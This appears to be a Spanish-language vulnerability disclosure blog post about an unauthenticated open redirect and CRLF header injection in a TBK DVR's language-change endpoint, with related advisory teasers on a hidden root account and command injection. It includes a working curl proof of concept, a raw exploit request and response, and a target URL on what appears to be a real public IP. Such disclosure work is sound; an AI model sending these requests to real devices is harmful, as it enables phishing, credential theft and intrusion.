[DVR TBK] Open Redirect ( en flujo de cambio de idioma ) - CVE-2026-####

El endpoint de cambio de idioma device.rsp?opt=changelanguage&language=<idioma>&url=<destino> copia el valor del parámetro url directamente al header Location de la respuesta, sin validar el esquema ni el dominio. Un atacante puede forjar un enlace que redirija a una víctima a un sitio controlado (phishing, robo de credenciales o tokens).
Componente afectado:
Endpoint / mecanismo:
GET /device.rsp?opt=changelanguage&language=X&url=Y(handler del CGI)Stack / versión: firmware
T2017040635_V01Precondición: ninguna (endpoint accesible sin autenticación)
url=http://example.com/aa.rsp → Location: http://example.com/aa.rsp (cualquier dominio).
Credenciales / contexto de prueba: acceso remoto no autenticado.
curl -i "http://<dvr>:85/device.rsp?opt=changelanguage&language=11&url=http://example.com/aa.rsp"
# => HTTP/1.0 302 Found
# Location: http://example.com/aa.rsp
- URL
- http://188.212.244.41:85/device.rsp?opt=changelanguage&language=11&url=//example.com/aa.rsp
- Endpoint
- GET /device.rsp?
- Parameter
- opt=changelanguage&language=11&url=//example.com/aa.rsp
GET /device.rsp?opt=changelanguage&language=11&url=//example.com/aa.rsp?%0d%0ax:%20qwe HTTP/1.1 Host: 192.168.0.101:85 User-Agent: Morzilla/7.0 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive Cookie: uid=root HTTP/1.0 302 Found content-type: text/html; charset=UTF-8 P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT' Location: //example.com/aa.rsp? x: qwe Set-Cookie:uid=root; Version=1 Set-Cookie:userlan=11; Expires=Fri, 02-Jan-2099 01:00:00 GMT; Version=1 <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF='//example.com/aa.rsp? x: qwe'>here</a></BODY></HTML>
Redirección de usuarios a sitios maliciosos (phishing) y, en flujos que usan redirecciones, robo de tokens/credenciales.
Phishing: un atacante envía a la víctima un enlace legítimo al DVR con url apuntando a un sitio clonado. La víctima confía en el dominio del DVR y es redirigida al sitio malicioso (robo de credenciales o de tokens en flujos tipo OAuth/redirección).
Precondición alcanzable: solo requiere que la víctima visite el enlace manipulado.
Actualizar a la ultima version estable disponible, la cual deberia poder cubrir minimamente:
Validar
urlcontra una lista cerrada de destinos internos (o rutas relativas).Rechazar cualquier esquema distinto de
http(s)y cualquier destino externo.
More from @CapitanAlfa
[TBK DVR] CRLF Injection con HTTP Response Splitting - CVE-2026-####
El endpoint device.rsp?opt=changelanguage&language=<idioma>&url=<destino> refleja los parámetros language y url en los headers de la respuesta ( Set-Cookie y Location , respectivamente) sin neutralizar los caracteres CR ( \r ) y LF ( \n ). Un atacante puede…
[TBK DVR] Backdoor: Cuenta root permite acceso de administrador. ( +Contraseña rota ) - CVE-2026-####
El dispositivo incorpora una segunda cuenta de administrador, root , con la contraseña que no aparece en la interfaz web (la lista de usuarios la filtra explícitamente). El acceso con root es válido y otorga privilegios de administrador, constituyendo una…
[TBK DVR ] Command injection sin autenticación permite RCE como root - CVE-2024-3721
El protocolo rsp expone un comando obfuscado device.rsp?opt=sys&cmd= S O S T R E A MAX (decodifica a streamax ) cuyo parámetro mdc se concatena en una llamada a system() sin sanitizar . El filtro de saneamiento bloquea ; , | , & y > , pero no la sustitución…



Comments
0